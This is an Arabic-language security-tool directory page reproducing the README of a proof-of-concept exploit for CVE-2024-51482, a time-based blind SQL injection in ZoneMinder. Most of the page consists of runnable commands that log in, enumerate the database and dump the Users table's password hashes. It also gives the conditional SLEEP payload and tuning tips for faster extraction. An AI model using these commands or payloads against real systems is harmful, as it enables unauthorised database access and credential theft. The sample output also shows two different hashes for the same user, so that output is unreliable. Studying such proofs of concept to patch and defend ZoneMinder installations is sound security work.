Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-51482-PoC — PoC مصادق عليه لحقن SQL أعمى قائم على الوقت لـ ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) | Kitploit
أدوات/GitHubGitHub/plur1bu5/cve-2024-51482-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

PoC مصادق عليه لحقن SQL أعمى قائم على الوقت لـ ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64)

عرض المستودع
14منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-51482-PoC

استغلال حقن SQL أعمى قائم على الوقت مع مصادقة لـ ZoneMinder v1.37. <= 1.37.64*

نظرة عامة

هذا هو إثبات مفهوم لاستغلال CVE-2024-51482، وهي ثغرة حقن SQL أعمى قائم على الوقت في وظيفة إدارة الأحداث في ZoneMinder. يتطلب الاستغلال مصادقة ويستخدم استعلامات SLEEP الشرطية لاستخراج البيانات من قاعدة البيانات.

الميزات

  • استغلال مع مصادقة - تسجيل الدخول باستخدام بيانات الاعتماد أو كوكي الجلسة
  • كشف الطول - بحث ثنائي للعثور على الطول الدقيق للسلسلة قبل الاستخراج
  • استخراج متوازي - استخراج متعدد الخيوط للأحرف لزيادة السرعة
  • خيارات بأسلوب sqlmap - تعداد قواعد البيانات، الجداول، الأعمدة، وتفريغ البيانات
  • إعدادات افتراضية آمنة - تأخير 3 ثوانٍ، 5 خيوط لدقة عالية
  • تتبع التقدم - عرض تقدم الاستخراج في الوقت الفعلي مع الوضع المفصل
  • مخرجات نظيفة - عرض بيانات مهيكلة في جدول منسق

المتطلبات

root@kitploit:~
pip install requests

بداية سريعة

الوضع الافتراضي - تفريغ بيانات الاعتماد

root@kitploit:~
python3 poc.py -t example.local -u admin -p password

باستخدام كوكي الجلسة

root@kitploit:~
python3 poc.py -t example.local --cookie 'ZMSESSID_value'

الوضع المفصل

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -v

الاستخدام

تعداد قواعد البيانات

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --dbs

تعداد الجداول

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm --tables

تعداد الأعمدة

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

تفريغ جدول معين

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

الخيارات

root@kitploit:~
إلزامي:
  -t, --target TARGET       عنوان الهدف (IP، اسم مضيف، أو رابط كامل)
  
المصادقة:
  -u, --username USERNAME   اسم المستخدم للمصادقة
  -p, --password PASSWORD   كلمة المرور للمصادقة
  --cookie COOKIE           كوكي الجلسة (ZMSESSID)

التعداد:
  --dbs                     تعداد قواعد البيانات
  -D, --database DATABASE   قاعدة البيانات المراد استخدامها
  --tables                  تعداد الجداول
  -T, --table TABLE         الجدول المراد استخدامه
  --columns                 تعداد الأعمدة
  --dump                    تفريغ بيانات الجدول

الأداء:
  --delay DELAY             وقت التأخير بالثواني (الافتراضي: 3، آمن)
  --threads THREADS         عدد الخيوط (الافتراضي: 5، آمن)
  -v, --verbose             إظهار تقدم الاستخراج

ضبط الأداء

الوضع الآمن (موصى به)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • السرعة: ~2-3 دقائق لكل تجزئة كلمة مرور
  • الدقة: عالية

الوضع السريع (قد تحدث أخطاء)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • السرعة: ~30-60 ثانية لكل تجزئة كلمة مرور
  • الدقة: قد تنتج أحرفًا غير صحيحة

مثال للمخرجات

root@kitploit:~
[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

كيف يعمل

  1. المصادقة - تسجيل الدخول باستخدام بيانات الاعتماد أو استخدام كوكي الجلسة المقدمة
  2. اختبار الثغرة - تأكيد أن الهدف ضعيف باستخدام حمولة SLEEP بسيطة
  3. كشف الطول - استخدام البحث الثنائي للعثور على الطول الدقيق للسلسلة
  4. الاستخراج المتوازي - استخراج جميع مواضع الأحرف في وقت واحد
  5. عرض البيانات - تنسيق النتائج في جدول نظيف

تنسيق الحمولة

يستخدم الاستغلال SLEEP الشرطي:

root@kitploit:~
1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • الشرط TRUE: لا تأخير (0 ثانية)
  • الشرط FALSE: تأخير كامل (3 ثوانٍ)

استكشاف الأخطاء وإصلاحها

نتائج غير دقيقة

إذا حصلت على أحرف خاطئة (مثل أن يصبح $ إلى 8):

root@kitploit:~
# قم بزيادة التأخير وتقليل عدد الخيوط
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

بطيء جدًا

إذا كان الاستخراج بطيئًا جدًا:

root@kitploit:~
# قم بتقليل التأخير وزيادة عدد الخيوط (قد تقل الدقة)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

لم يتم العثور على بيانات

إذا كان الجدول الافتراضي zm.Users غير موجود:

root@kitploit:~
# قم بتعداد قواعد البيانات أولاً
python3 poc.py -t example.local -u admin -p password --dbs

# ثم قم بتعداد الجداول
python3 poc.py -t example.local -u admin -p password -D database_name --tables

معلومات CVE

  • CVE ID: CVE-2024-51482
  • الإصدارات المتأثرة: ZoneMinder v1.37.* <= 1.37.64
  • تم الإصلاح في: v1.37.65
  • نوع الثغرة: حقن SQL أعمى قائم على الوقت
  • درجة CVSS: TBD

إخلاء مسؤولية

هذه الأداة مخصصة لأغراض الاختبارات الأمنية التعليمية والمرخصة فقط.

  • لا تستخدم هذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها
  • الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني
  • المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة
  • احصل دائمًا على إذن مناسب قبل إجراء التقييمات الأمنية

المراجع

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

الترخيص

هذا المشروع مقدم للأغراض التعليمية فقط. استخدمه بمسؤولية وأخلاقية.


⭐ إذا وجدت هذا مفيدًا، يرجى وضع نجمة للمستودع!

تنزيل الأداة